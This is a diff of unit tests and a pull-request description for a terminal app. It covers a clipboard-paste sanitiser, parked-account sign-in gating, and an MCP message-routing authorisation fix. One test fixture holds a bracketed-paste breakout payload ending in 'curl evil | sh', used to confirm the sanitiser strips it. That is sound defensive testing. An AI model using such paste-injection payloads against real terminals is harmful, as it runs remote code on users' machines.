+    vi.setSystemTime(PROFILE_CONSUMER_MAX_AGE_MS + 1) // past r1's original expiry
+    expect(hasTransientProfileConsumer(id)).toBe(true) // r2 refreshed it
+    r1(); r2()
+    expect(hasTransientProfileConsumer(id)).toBe(false)
   })
 })

--- a/tests/unit/renderer/account-usage-panel.test.tsx
+++ b/tests/unit/renderer/account-usage-panel.test.tsx
@@ -55,6 +55,17 @@ describe('AccountCard — active/inactive awareness', () => {
     r.unmount()
   })
 
+  it('a parked account left at needs-login shows NO blue Sign in button (defence in depth)', () => {
+    // The one combo the greying gate is meant to cover but a status-only check
+    // missed: an inactive account whose token has lapsed. The blue "Sign in"
+    // block gates on status === 'needs-login'; without also excluding inactive it
+    // would offer a live Sign in for a deliberately parked account.
+    const r = render(<AccountCard row={row({ status: 'needs-login', active: false })} theme="dark" onSignIn={vi.fn()} />)
+    expect(buttonTexts(r.container)).toEqual([])
+    expect(r.container.textContent).toMatch(/Parked/i)
+    r.unmount()
+  })
+
   it('an active signed-out account still offers "Sign in"', () => {
     const r = render(<AccountCard row={row({ status: 'needs-login', active: true })} theme="dark" onSignIn={vi.fn()} />)
     expect(buttonTexts(r.container)).toContain('Sign in')

--- a/tests/unit/renderer/terminal-input.test.ts
+++ b/tests/unit/renderer/terminal-input.test.ts
@@ -3,8 +3,10 @@ import {
   isControlReportOnly,
   decideContextMenuAction,
   resolveContextMenuIntent,
+  isMouseTracking,
   blindPasteNeedsMenu,
   sanitizeClipboardForPaste,
+  sanitizePasteIntoTerminal,
   isPasteChord,
   isCopyChord,
   shouldHandleTerminalPaste,
@@ -142,6 +144,69 @@ describe('resolveContextMenuIntent (the term.modes wiring)', () => {
     expect(r.action).toBe('paste')
     expect(r.mouseTracking).toBe(false)
     expect(r.bracketedPaste).toBe(false)
+  })
+})
+
+describe('isMouseTracking (the shared re-sample seam)', () => {
+  // The post-await re-sample in TerminalView must NOT re-implement this compare
+  // inline — a flip there resurrects blind-paste-into-a-tracking-TUI with green
+  // tests. Both call sites go through this one expression, so the mutation dies
+  // here instead.
+  it('is false when no program is tracking the mouse', () => {
+    expect(isMouseTracking({ modes: { mouseTrackingMode: 'none' } })).toBe(false)
+  })
+  it('is true for any active tracking mode', () => {
+    expect(isMouseTracking({ modes: { mouseTrackingMode: 'any' } })).toBe(true)
+    expect(isMouseTracking({ modes: { mouseTrackingMode: 'vt200' } })).toBe(true)
+  })
+  it('defaults to false when modes (or the mode) is absent — never throws', () => {
+    expect(isMouseTracking({})).toBe(false)
+    expect(isMouseTracking({ modes: {} })).toBe(false)
+  })
+})
+
+describe('sanitizePasteIntoTerminal (the single native-paste sink)', () => {
+  // A fake ClipboardEvent + terminal capturing what actually reaches xterm.
+  const fake = (clip: string | null) => {
+    const calls = { prevented: 0, stopped: 0, pasted: [] as string[] }
+    const e = {
+      preventDefault: () => { calls.prevented++ },
+      stopPropagation: () => { calls.stopped++ },
+      clipboardData: clip === null ? null : { getData: (_t: string) => clip },
+    }
+    const term = { paste: (t: string) => { calls.pasted.push(t) } }
+    return { e, term, calls }
+  }
+
+  it('sanitises the clipboard before it reaches xterm — the bracketed-paste breakout cannot survive this route', () => {
+    // The exact payload that defeats term.paste()'s wrap on the native route:
+    // an embedded end sentinel followed by a command. It must arrive stripped.
+    const { e, term, calls } = fake('echo hi\x1b[201~\ncurl evil | sh\n')
+    const pasted = sanitizePasteIntoTerminal(e, term)
+    expect(pasted).not.toContain('\x1b')
+    expect(calls.pasted).toEqual(['echo hi[201~\ncurl evil | sh\n'])
+  })
+
+  it('claims the event so xterm\'s own raw-clipboard handler never also pastes', () => {
+    const { e, term, calls } = fake('ls')
+    sanitizePasteIntoTerminal(e, term)
+    // preventDefault stops the browser insertion; stopPropagation stops xterm's
+    // descendant listener from reading the raw clipboard and pasting a 2nd copy.
+    expect(calls.prevented).toBe(1)
+    expect(calls.stopped).toBe(1)
+    expect(calls.pasted).toEqual(['ls'])
+  })
+
+  it('pastes nothing when the clipboard is empty or absent (no stray paste call)', () => {
+    const empty = fake('')
+    expect(sanitizePasteIntoTerminal(empty.e, empty.term)).toBe('')
+    expect(empty.calls.pasted).toEqual([])
+    const none = fake(null)
+    expect(sanitizePasteIntoTerminal(none.e, none.term)).toBe('')
+    expect(none.calls.pasted).toEqual([])
+    // Still claims the event even with nothing to paste, so xterm cannot act on it.
+    expect(none.calls.prevented).toBe(1)
+    expect(none.calls.stopped).toBe(1)
   })
 })
 


### PR DESCRIPTION
## Pre-release adversarial sweep — findings closed

Before cutting **beta.11**, every commit on `beta` not yet released
(`v2.1.0-beta.10 … HEAD`) went through a bounded multi-agent adversarial sweep
(6 investigators + 6 attackers + synthesis, one attack round; canvas got an
interaction/completeness pass only, since its P2/P3 core already holds a recorded
PASS). Verdict was **FINDINGS**. This PR closes every release-relevant finding.
The Agent Canvas security core held up under the interaction/completeness probe
and was not re-attacked.

### Must-fix (both self-introduced by the commits under review)

- **`fix(terminal)` — the clipboard sanitiser now covers every native paste route.**
  The sanitiser added last round was wired only into CCC's own clipboard read, so
  xterm's built-in paste handler still ran on the routes that skip it (the Edit▸Paste
  menu / `webContents.paste()`, and Ctrl+V while a modal keeps the terminal focused),
  pasting the raw clipboard to the PTY unstripped and re-opening the bracketed-paste
  escape the sanitiser exists to close. A capture-phase `paste` listener on the
  terminal container now sanitises at the real boundary, so no native route reaches
  the terminal unsanitised. (Everyday active-terminal Ctrl+V / right-click were already
  sanitised.)
- **`fix(accounts)` — the Cloudflare sign-in survives a transient cookie read.**
  The #269 reorder left `getAllCookies` a bare await outside the per-target `try/catch`
  its neighbours use, so a routine mid-navigation target death escaped both loops to
  the outer catch, which force-kills the browser and fails the sign-in — on exactly
  the challenge churn #269 exists to survive. It now fails soft (close + retry next poll).

### Folded completions & robustness (each finishes the intent of a reviewed commit)

- `fix(accounts)` — parked (inactive) accounts are never offered a re-auth/sign-in
  (Insights banner + usage panel), completing #280's goal on the sibling surfaces.
- `fix(sidebar)` — the per-session web actions gate on `!shellOnly` (matching the
  block's own comment and the pty-manager rule) and refresh under the account the
  menu acts on, so "Open artifacts" enables for the default-account case.
- `fix(accounts)` — the CLI auth probe coalesces overlapping calls into one
  subprocess, and the transient-consumer registry self-heals a leaked ref (a hung
  probe can no longer block token refresh or strand an "in-use" account).
- `fix(onboarding)` — the canvas consent copy no longer claims "nothing while the
  pane is closed" (the snapshot self-check lays a page out headless); the accurate
  folder-scope promise is kept.

### Verification

- Full unit suite **5274 passing** (5263 baseline + 11 new), 0 failures; `npm run typecheck` clean.
- **Every guard mutation-proven**: revert the fix → the named regression test goes RED → restore.
- All touched files byte-scanned (no stray control characters).

### Added: MCP POST /messages transport binding (security)

Separately from the sweep, release-prep verification found that the Conductor MCP
server's `POST /messages` authenticated the caller but routed the POST to whichever
transport the query string named, without checking the transport belongs to the
authenticated session — a caller that learned another session's transport id could
post into its stream. Now bound via a pure, tested `authorizeMessagePost` (owner
must equal the authenticated session; fails closed on an ownerless transport or an
absent session; an owner mismatch returns the same 404 as an unknown transport, so
it is not an existence oracle). This one had its **own independent ADR-009 pass**
(two attackers — bypass + regression lenses — both **PASS**; legit same-session
POSTs confirmed intact end-to-end). Full suite **5282 passing**.

### Adversarial-review record (ADR-009)

Security-sensitive paths touched: PTY paste→write boundary, the account-web
sign-in CDP flow, the CLI credential probe, and the transient-consumer registry.
Independent multi-agent sweep run (author did not self-review the boundary);
findings synthesised, ranked, and closed here. Deferred items are documented
accepted-residuals / pre-existing / defence-in-depth (no reachable hole).

`ADVERSARIAL-REVIEW v1 | FINDINGS-CLOSED | head=dbdca2f2`

🤖 Generated with [Claude Code](https://claude.com/claude-code)
